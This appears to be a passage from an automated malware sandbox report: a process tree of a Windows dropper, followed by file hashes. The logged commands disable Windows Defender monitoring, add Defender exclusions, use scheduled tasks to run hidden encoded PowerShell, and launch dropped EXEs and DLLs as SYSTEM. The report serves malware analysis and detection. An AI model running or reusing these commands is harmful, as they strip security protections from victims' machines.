\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:304
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1884
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1668
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1780
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnKewHgYK" /SC once /ST 04:26:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnKewHgYK"4⤵PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnKewHgYK"4⤵PID:520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmkQfSnzPaOQmejIPN" /SC once /ST 08:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy\fHTVDPNOrFunBax\Emqfydw.exe\" k4 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1112
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3DC944BF-D867-4669-955C-B498140D186D} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵PID:976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:876
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1300
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1792
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1636
-
C:\Windows\system32\taskeng.exetaskeng.exe {4B273662-243E-43D2-9C55-C7D5286B06AD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1456
-
C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy\fHTVDPNOrFunBax\Emqfydw.exeC:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy\fHTVDPNOrFunBax\Emqfydw.exe k4 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmzrmGPbP" /SC once /ST 06:04:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmzrmGPbP"3⤵PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmzrmGPbP"3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1744
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1112
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSmYNXprA" /SC once /ST 07:53:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSmYNXprA"3⤵PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSmYNXprA"3⤵PID:1644
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:643⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:323⤵PID:1520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:643⤵PID:1760
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:644⤵PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\PdIuKibDUUQxOHXi\CVCVxINt\pxpgVnYpsVjAwKBY.wsf"3⤵PID:860
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\PdIuKibDUUQxOHXi\CVCVxINt\pxpgVnYpsVjAwKBY.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1176 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CjFbSUxMfeUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CjFbSUxMfeUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR" /t REG_DWORD /d 0 /reg:644⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aCihPuJdU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aCihPuJdU" /t REG_DWORD /d 0 /reg:644⤵PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gAVxmqQUvZVtC" /t REG_DWORD /d 0 /reg:324⤵PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gAVxmqQUvZVtC" /t REG_DWORD /d 0 /reg:644⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lzmeupYjvcHU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lzmeupYjvcHU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\txBXwMIRPrsSMVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\txBXwMIRPrsSMVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy" /t REG_DWORD /d 0 /reg:644⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CjFbSUxMfeUn" /t REG_DWORD /d 0 /reg:324⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CjFbSUxMfeUn" /t REG_DWORD /d 0 /reg:644⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aCihPuJdU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aCihPuJdU" /t REG_DWORD /d 0 /reg:644⤵PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gAVxmqQUvZVtC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gAVxmqQUvZVtC" /t REG_DWORD /d 0 /reg:644⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lzmeupYjvcHU2" /t REG_DWORD /d 0 /reg:324⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lzmeupYjvcHU2" /t REG_DWORD /d 0 /reg:644⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\txBXwMIRPrsSMVVB" /t REG_DWORD /d 0 /reg:324⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\txBXwMIRPrsSMVVB" /t REG_DWORD /d 0 /reg:644⤵PID:688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\TYVqHtDonLSrWRgdy" /t REG_DWORD /d 0 /reg:644⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:324⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PdIuKibDUUQxOHXi" /t REG_DWORD /d 0 /reg:644⤵PID:1320
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnwWBlPCt" /SC once /ST 02:50:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnwWBlPCt"3⤵PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnwWBlPCt"3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:908
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1152
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1388
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCsHVTpDKRsgJbbvM" /SC once /ST 06:39:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PdIuKibDUUQxOHXi\nWEskwEUVfOVpGu\AsfriZX.exe\" SJ /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bCsHVTpDKRsgJbbvM"3⤵PID:1316
-
-
-
C:\Windows\Temp\PdIuKibDUUQxOHXi\nWEskwEUVfOVpGu\AsfriZX.exeC:\Windows\Temp\PdIuKibDUUQxOHXi\nWEskwEUVfOVpGu\AsfriZX.exe SJ /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmkQfSnzPaOQmejIPN"3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1048
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1124
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:580
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\aCihPuJdU\lxZNkZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DWGOMtUonAyVmtF" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DWGOMtUonAyVmtF2" /F /xml "C:\Program Files (x86)\aCihPuJdU\miJTdvt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DWGOMtUonAyVmtF"3⤵PID:1284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DWGOMtUonAyVmtF"3⤵PID:1724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DePHkgrANbFXcc" /F /xml "C:\Program Files (x86)\lzmeupYjvcHU2\DWAfuap.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VcizYAvuthZEl2" /F /xml "C:\ProgramData\txBXwMIRPrsSMVVB\ZvorENW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wBCxFzStBtrXJcZhY2" /F /xml "C:\Program Files (x86)\KzGlOGkLLwgyKzCwnsR\iPKLYJK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfQpDZKDdleaIHYfLCa2" /F /xml "C:\Program Files (x86)\gAVxmqQUvZVtC\jlREteD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yraZWSSXLaCwWiCxD" /SC once /ST 00:48:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PdIuKibDUUQxOHXi\eIOarqPs\gylAPmN.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yraZWSSXLaCwWiCxD"3⤵PID:756
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1124
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1700
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCsHVTpDKRsgJbbvM"3⤵PID:1380
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PdIuKibDUUQxOHXi\eIOarqPs\gylAPmN.dll",#1 /site_id 5254032⤵PID:1704
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PdIuKibDUUQxOHXi\eIOarqPs\gylAPmN.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yraZWSSXLaCwWiCxD"4⤵PID:452
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2028
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:552
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1688
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57ea69dd304bcfe3e767b2f2f6feaef67
SHA12d95f726644d9c426f6f187d78593cb2c02d8015
SHA256f956e351e1a384e991289a3fade0bb1baf21635e9f3e24f2b2f2dbdeeb327d97
SHA5120b6299f986af74d4a8d9a8a020e710757e433aea227b28e708af7e9c7006b41afb03c43b80091069e68645023aaaa37d65c45752f6f4a3f45184a8108c7a63c2
-
Filesize
2KB
MD59517d6c2e2a0d0d956086deb24b88403
SHA1c1c22697b8465a053269e968f245183b649b5d6c
SHA25603cf09270e6de8b654b4f72b2562adfa821a9033e695a0226d6cbb5718254bf7
SHA5121df13476fce4f7034c539ab6b06ac3930300e952bdaa73f6db88b3a737173b876785e5391efca3ac953d6465303b8800d9404ac445c4f667724d106201b731eb
-
Filesize
2KB
MD511df3aca3d758e31ebda86a5f2040e7e
SHA1a25efad0989b643c0e332087b730f6ca0dbe10d3
SHA2569e392e13c8323196ce652969192a626ffe0799e0c88f93171d07fd3ceec17d84
SHA512afc7133d6918c9de87a589ceb0cf81f06c9f250b354b169db6652fb2078d167c24e13f602e1bd86fb44a53052bb526fcdee86e282a2bdc894089e98cc3f8d74c
-
Filesize
2KB
MD57118b0ce0cabc5193db29113a82522c7
SHA1fbe7873e2f0d143db8e0d58ad1928fc275d42e06
